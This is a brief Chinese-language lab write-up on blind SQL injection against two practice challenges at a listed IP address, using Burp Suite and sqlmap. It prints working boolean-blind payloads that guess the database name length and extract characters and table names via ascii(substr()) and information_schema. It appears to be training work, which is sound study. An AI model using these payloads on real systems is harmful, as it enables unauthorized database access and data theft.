盲注

工具：sqlmap Burpsuite

两关地址：

http://59.63.200.79:8812/New/BlindBased/RankOne/sql-one/

http://59.63.200.79:8812/New/BlindBased/RankTwo/sql-two/

盲注第一题
首先输入?Id=1 和?id=1’ 页面没有有用的回显，只能看出哪个是正确页面，哪个是错误页面：
正确页面：

错误页面：

判断为盲注：先试用length()函数判断数据库名长度：
?id=1’ and length(database())=8—+

页面显示正常，and前后均为真，说明数据库长度为8.

然后跑数据库名首字母:
?id=1’ and (ascii(substr(database(),0,1)))=115 —+
这里使用burpsuite工具遍历ascii码：
?id=1’and%20(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=’security’),1,1)))=§100§%20—+
跑的过程中我发现一个问题： 在burpsuite中要发送的包必须要转换成url编码才可以 否则不会返回HTML页面。

101的length明显与其他length值不同，所以数据库名第二个字母为e.
然后逐个跑出数据库名，表名，字段名，感觉确实有点麻烦。方法会了就先不深究了，下面使用sqlmap:

盲注第二关
首先输入?Id=1

发现其与第一关不一样的是单引号闭合改为双引号闭合，其余步骤与第一题类似。